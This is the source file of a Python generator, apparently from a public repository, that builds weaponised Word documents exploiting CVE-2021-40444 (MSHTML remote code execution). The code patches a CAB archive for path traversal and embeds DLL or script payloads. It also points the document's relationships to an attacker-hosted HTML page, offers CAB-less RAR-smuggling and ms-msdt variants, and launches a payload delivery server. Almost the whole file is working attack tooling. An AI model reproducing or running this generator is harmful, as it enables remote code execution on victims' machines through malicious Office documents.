You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
CVE-2021-40444/generator.py

476 lines
17 KiB

3 years ago
#!/usr/bin/env python3
# Microsoft Office Remote Code Execution Exploit via Logical Bug
# Result is ability for attackers to execute arbitrary custom DLL's
# downloaded and executed on target system
import argparse
import base64
3 years ago
import binascii
import random
import re
import secrets
3 years ago
import shutil
import string
import struct
import sys
import os
import subprocess
import tempfile
import time
3 years ago
import traceback
from pathlib import Path
import win32com.client
3 years ago
from cab_parser import Cab
from in_place import InPlace
def patch_cab(path: Path, original_inf_path, patched_inf_path):
with InPlace(str(path.absolute()), mode="b") as out_cab:
cab = Cab(out_cab.read())
print(" [*] Setting setID to 1234")
cab.change_set_id(1234)
print(" [*] Setting CFFolder.coffCabStart to 80")
cab.change_coff_cab_start(80)
print(" [*] Setting CFFolder.CCFData to 2")
cab.change_ccfdata_count(2)
size = struct.unpack("<I", b"\x00\x22\x44\x00")[0]
print(f" [*] Setting CFFile.CbFile to {size}")
cab.change_cffile_cbfile(size)
print(" [*] Making INF file read only")
cab.make_file_read_only()
print(" [*] Zeroing out Checksum")
cab.zero_out_signature()
out_cab.write(cab.to_bytes())
with InPlace(str(path.absolute()), mode="b") as out_cab:
content = out_cab.read()
content = content.replace(original_inf_path, patched_inf_path)
print(f" [*] Patching path '{original_inf_path.decode()}' to '{patched_inf_path.decode()}'")
out_cab.write(content)
def make_ddf(ddf_file: Path, cab_file: Path, inf_file: Path):
# We need to generate a DDF file for makecab to work properly
# CabinetNameTemplate = Basename of the cab file
# DiskDirectoryTemplate = Directory where the cab file will be
with open(str(ddf_file.absolute()), "w") as ddf:
ddf.write(rf""".OPTION EXPLICIT
.Set CabinetNameTemplate={cab_file.name}
.set DiskDirectoryTemplate={cab_file.parent.name}
.Set CompressionType=MSZIP
.Set UniqueFiles=OFF
.Set Cabinet=ON
.Set Compress=OFF
.Set CabinetFileCountThreshold=0
.Set FolderFileCountThreshold=0
.Set FolderSizeThreshold=0
.Set MaxCabinetSize=0
.Set MaxDiskFileCount=0
.Set MaxDiskSize=0
"{inf_file.absolute()}"
""")
3 years ago
def execute_cmd(cmd, execute_from=None):
print(cmd)
3 years ago
try:
subprocess.check_output(
cmd,
shell=True,
cwd=execute_from
)
except subprocess.CalledProcessError as calledProcessError:
print(calledProcessError)
exit(1)
def patch_rar(rar_file, script: bytes):
# JS downloader string
downloader = bytearray(script)
# Appending null byte
# downloader.append(0)
content = bytearray(open(rar_file, "rb").read())
content = bytes(downloader + content)
with open(rar_file, "wb") as rar:
rar.write(content)
def rar(file: Path, rar_file, delete=False):
try:
output = subprocess.check_output(
f"bin\\rar.exe a -ep \"{rar_file}\" \"{str(file)}\"",
stderr=subprocess.STDOUT,
shell=True
)
if delete:
file.unlink(missing_ok=True)
except subprocess.CalledProcessError:
print("[-] Error generating RAR archive")
exit(1)
def make_rar(rar_file):
file_name = None
with tempfile.NamedTemporaryFile(
suffix=".txt",
delete=False,
mode="w"
) as txt_file:
txt_file.write("You've been pwnd!")
file_name = Path(txt_file.name).absolute()
rar(file_name, rar_file, delete=True)
def choose_template(templates: list):
try:
print("[*] Multiple compatible templates identified, choose one:")
choice = -1
for n, t in enumerate(templates, start=0):
print(f" {n}: {t}")
while not 0 <= choice <= len(templates) - 1:
try:
choice = int(input(" $> "))
except ValueError:
continue
return templates[choice]
except KeyboardInterrupt:
print("[-] Aborting")
sys.exit(1)
def append_garbage(content: str, exploit: str):
eol = '\n'
garbage = ""
filler = "A" * 80000
if exploit == ".vbs":
eol = '" _ \n & "'
garbage = rf"""
Dim Garbage
Garbage = "{eol.join([filler[i:i + 100] for i in range(0, len(filler), 100)])}";
"""
elif exploit == ".js":
garbage = f"var x = '';{eol}" + eol.join([f"x = '{filler[i:i + 100]}';" for i in range(0, len(filler), 100)])
elif exploit in [".wsf", ".hta"]:
garbage = f"<!--{eol}{filler}{eol}-->{eol}"
return content + garbage
def get_file_extension_based_uri(exploit, no_cab=False):
if exploit == ".dll":
return ".cpl"
elif exploit in [".hta", ".js", ".vbs", ".wsf", ".hta"] and no_cab:
return exploit
elif exploit in [".hta", ".js", ".vbs", ".wsf", ".hta"]:
return ".wsf"
else:
return "ms-msdt"
def get_mime_type(exploit):
if exploit == ".dll":
return "application/octet-stream"
elif exploit == ".hta":
return "application/hta"
elif exploit == ".js":
return "text/javascript"
elif exploit == ".vbs":
return "text/vbscript"
elif exploit == ".wsh":
return "text/plain"
elif exploit == ".wsf":
return "text/xml"
else:
return "text/plain"
def generate_payload(payload, server_url, basename, copy_to=None, no_cab=False, convert=False):
3 years ago
# Current Working Directory
working_directory = Path(__file__).parent
# Relevant directories for Execution
data_path = working_directory.joinpath("data")
word_dat_path = data_path.joinpath("word_dat")
srv_path = working_directory.joinpath("srv")
out_path = working_directory.joinpath("out")
cab_path = working_directory.joinpath("cab")
template_path = working_directory.joinpath("template")
# Relevant files
tmp_path = data_path.joinpath("tmp_doc")
word_dll = data_path.joinpath(f'{basename}.dll')
word_doc = out_path.joinpath('document.docx')
ddf = data_path.joinpath('mswordcab.ddf')
archive_file = out_path.joinpath(f"{basename}.cab")
rar_file = out_path.joinpath(f"{basename}.rar")
exploit_file = cab_path.joinpath(f"{basename}.inf")
exploit = os.path.splitext(args.payload)[1]
if no_cab and exploit not in [".wsf", ".ps1"]:
print("[-] CAB-less version chosen, only .wsf and .ps1 are currently working")
exit(1)
lolbin = exploit not in [".dll", ".ps1"]
if exploit == ".wsf" and no_cab:
id = "cabless-rar-"
elif exploit == ".ps1" and no_cab:
id = "cabless-msdt-"
elif lolbin and no_cab:
id = "cabless-smuggling-"
elif lolbin:
id = "cab-uri-"
else:
id = "cab-orig-"
script_file = None
templates = [
f for f in os.listdir(str(template_path))
if os.path.isfile(os.path.join(str(template_path), f))
and f.find(id) > -1
]
html_template_file = template_path.joinpath(choose_template(templates))
3 years ago
html_final_file = srv_path.joinpath(f"{basename}.html")
# Checking ephemeral directories
tmp_path.mkdir(exist_ok=True)
cab_path.mkdir(exist_ok=True)
srv_path.mkdir(exist_ok=True)
3 years ago
out_path.mkdir(exist_ok=True)
3 years ago
print(f' [>] Payload: {payload}')
print(f' [>] HTML/CAB/JS Hosting Server: {server_url}')
3 years ago
b64_payload = None
payload_content = None
3 years ago
try:
if exploit != ".dll" and no_cab:
payload_content = open(payload, 'r').read().strip().encode()
elif exploit != ".dll":
payload_content = "\x5a\x4d" + open(payload, 'r').read().strip()
payload_content = append_garbage(payload_content, exploit)
payload_content = payload_content.encode()
else:
payload_content = open(payload, 'rb').read()
3 years ago
with open(str(word_dll), 'wb') as filep:
filep.write(payload_content)
b64_payload = base64.b64encode(payload_content).decode()
3 years ago
except FileNotFoundError:
print('[-] Payload specified not found!')
3 years ago
exit(1)
except Exception as e:
print(f"[-] Exception: {e}")
exit(1)
if lolbin and no_cab:
tmp = Path(exploit_file.parent).joinpath(basename + get_file_extension_based_uri(exploit))
exploit_file.unlink(missing_ok=True)
exploit_file = Path(tmp)
with open(str(exploit_file), "w") as out:
out.write(payload_content.decode())
print(f"[*] Exposing script file {exploit_file.name} to the webserver for download")
shutil.copy(str(exploit_file), str(srv_path))
3 years ago
shutil.copytree(str(word_dat_path), str(tmp_path), dirs_exist_ok=True)
print('[*] Crafting Relationships to point to HTML/CAB/JS Hosting Server...')
3 years ago
with InPlace(str(tmp_path.joinpath("word").joinpath("_rels").joinpath('document.xml.rels'))) as rels:
xml_content = rels.read()
if exploit != ".ps1":
xml_content = xml_content.replace('<EXPLOIT_HOST_HERE>', f'{server_url}/{html_final_file.name}')
else:
xml_content = xml_content.replace('mhtml:<EXPLOIT_HOST_HERE>!x-usc:<EXPLOIT_HOST_HERE>', f'{server_url}/{html_final_file.name}!')
# xml_content = xml_content.replace('<INF_CHANGE_HERE>', inf_file.name)
3 years ago
rels.write(xml_content)
print('[*] Packing MS Word .docx file...')
word_doc.unlink(missing_ok=True)
shutil.make_archive(str(word_doc), 'zip', str(tmp_path))
shutil.move(str(word_doc) + ".zip", str(word_doc))
shutil.rmtree(str(tmp_path))
if not no_cab:
print('[*] Generating CAB file...')
make_ddf(ddf_file=ddf, cab_file=archive_file, inf_file=exploit_file)
shutil.move(word_dll, exploit_file)
3 years ago
execute_cmd(f'makecab /F "{ddf.absolute()}"', execute_from=str(working_directory))
patched_path = f'../{exploit_file.name}'.encode()
patch_cab(archive_file, str(exploit_file.name).encode(), patched_path)
shutil.copy(archive_file, srv_path)
shutil.copy(ddf, srv_path)
3 years ago
word_dll.unlink(missing_ok=True)
exploit_file.unlink(missing_ok=True)
3 years ago
ddf.unlink(missing_ok=True)
shutil.rmtree(str(cab_path.absolute()))
print('[*] Updating information on HTML exploit...')
shutil.copy(str(html_template_file), str(html_final_file))
print('[*] Copying MS Word .docx to Desktop for local testing...')
dest = Path(os.getenv("USERPROFILE")).joinpath("Desktop").joinpath(word_doc.name)
dest.unlink(missing_ok=True)
shutil.copy(str(word_doc.absolute()), dest)
if copy_to and os.path.isdir(copy_to) and not no_cab:
3 years ago
print(f'[*] Copying malicious cab to {copy_to} for analysis...')
dest = Path(copy_to).joinpath(archive_file.name)
3 years ago
dest.unlink(missing_ok=True)
shutil.copy(str(archive_file.absolute()), dest)
print(f' [>] CAB file stored at: {archive_file}')
3 years ago
with InPlace(str(html_final_file)) as p_exp:
content = p_exp.read()
content = content.replace('<HOST_CHANGE_HERE>', f"{server_url}/{archive_file.name}")
content = content.replace('<INF_CHANGE_HERE>', f"{exploit_file.name}")
content = content.replace('<RAR_CHANGE_HERE>', f"{rar_file.name}")
content = content.replace('<URI_SCHEME_HERE>', get_file_extension_based_uri(exploit))
content = content.replace('<BASE64_DATA_HERE>', b64_payload)
content = content.replace('<PAYLOAD_HERE>', payload_content.decode()) if exploit != ".dll" else ""
content = content.replace('<MIME_TYPE_HERE>', get_mime_type(exploit))
content = content.replace('<FIRST_LETTER>', get_file_extension_based_uri(exploit)[1])
content = content.replace('<SECOND_LETTER>', get_file_extension_based_uri(exploit)[2])
content = content.replace('<THIRD_LETTER>', get_file_extension_based_uri(exploit)[3])
3 years ago
p_exp.write(content)
print(f'[+] Success! MS Word Document stored at: {word_doc}')
if convert:
if convert_to_rtf(word_doc):
print(f'[+] Success! MS Word Document was converted to RTF!')
else:
print(f'[-] ERROR. MS Word Document could not be converted to RTF.')
if exploit == ".wsf" and no_cab:
print(f"[*] Generating RAR file {rar_file.name}... and pushing it to 'Downloads', to emulate user download")
rar_dest = Path(os.getenv("USERPROFILE")).joinpath("Downloads").joinpath(rar_file.name)
wsf_file = Path(os.getenv("USERPROFILE")).joinpath("Downloads").joinpath("test.wsf")
rar(word_doc, rar_dest, delete=False)
patch_rar(rar_file=rar_dest, script=payload_content)
shutil.copy(str(rar_dest), str(srv_path))
shutil.copy(str(rar_dest), str(wsf_file))
return html_final_file.name
3 years ago
def start_server(ip, port, directory: Path):
this = Path(__file__).parent.joinpath("util").joinpath("server.py")
3 years ago
subprocess.Popen(
f'start /D "{directory.absolute()}" "CVE-2021-40444 Payload Delivery Server" cmd /c python "{this.absolute()}" {ip} {port}',
shell=True,
close_fds=True,
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
creationflags=subprocess.DETACHED_PROCESS
)
def start_client(url):
subprocess.Popen(
f'"C:\\Program Files\\Internet Explorer\\iexplore.exe" "{url}"',
3 years ago
shell=True,
close_fds=True,
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
creationflags=subprocess.DETACHED_PROCESS
)
def clean():
pass
def convert_to_rtf(filename):
new_file = os.path.splitext(filename)[0] + ".rtf"
try:
word = win32com.client.Dispatch("Word.application")
word.Visible = False
wordDoc = word.Documents.Open(str(Path(filename).absolute()))
# wdFormatRTF = 6
wordDoc.SaveAs2(str(Path(new_file).absolute()), FileFormat=6)
wordDoc.Close()
return True
except:
traceback.print_exc()
return False
3 years ago
def validate_filename(filename):
# Required length for the file name
required_length = 12
3 years ago
if not filename:
filename = ""
current_length = len(filename)
if current_length > 12:
filename = filename[:12]
3 years ago
gap = required_length - current_length
return filename + ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(gap))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='[%] CVE-2021-40444 - MS Office Word RCE Exploit [%]')
parser.add_argument('-P', '--payload', type=str, required=True,
help="DLL payload to use for the exploit")
parser.add_argument('-u', '--url', type=str, default=None, required=True,
help="Server URL for malicious references (CAB->INF)")
parser.add_argument('-o', '--output', type=str, default=None, required=False,
help="Output files basename (no extension)")
parser.add_argument('--host', action='store_true', default=False, required=False,
help="If set, will host the payload after creation")
parser.add_argument('-c', '--copy-to', type=str, default=None, required=False,
help="Copy payload to an alternate path")
parser.add_argument('-nc', '--no-cab', action='store_true', default=False, required=False,
help="Use the CAB-less version of the exploit")
parser.add_argument('-t', '--test', action='store_true', default=False, required=False,
help="Open IExplorer to test the final HTML file")
parser.add_argument('-x', '--convert', action='store_true', default=False, required=False,
help="Convert DOCX into RTF format")
3 years ago
args = parser.parse_args()
filename = validate_filename(args.output)
print('[*] Generating a malicious payload...')
html = None
server = args.url
port = 80
ip = "127.0.0.1"
scheme = ""
try:
scheme, ip = server.split(":")[0], server.replace("//", "/").split("/")[1].split(":")[0]
if scheme == "http":
port = 80
elif scheme == "https":
port = 443
else:
raise NotImplemented(f"Scheme {scheme} is not supported")
if len(server.split(":")) > 2:
port = int(server.split(":")[2].split("/")[0])
except NotImplemented as e:
print(f"[-] {e}")
exit(1)
except (ValueError, KeyError, IndexError):
print("[-] Wrong URL format")
exit(1)
3 years ago
try:
html = generate_payload(payload=args.payload, server_url=server, basename=filename, copy_to=args.copy_to,
no_cab=args.no_cab, convert=args.convert)
except (SystemExit, KeyboardInterrupt):
exit(1)
3 years ago
except:
traceback.print_exc()
exit(1)
if args.host and html:
print(f'[*] Hosting HTML Exploit at {scheme}://{ip}:{port}/{html}...')
start_server(ip=ip, port=port, directory=Path(__file__).parent.joinpath("srv"))
if args.test:
if os.path.splitext(args.payload)[1] != ".wsf":
print(f"[-] IE testing might not compatible with {os.path.splitext(args.payload)[1]}")
print(f'[*] Opening IE at {args.url}/{html}...')
time.sleep(3)
start_client(f"{args.url}/{html}")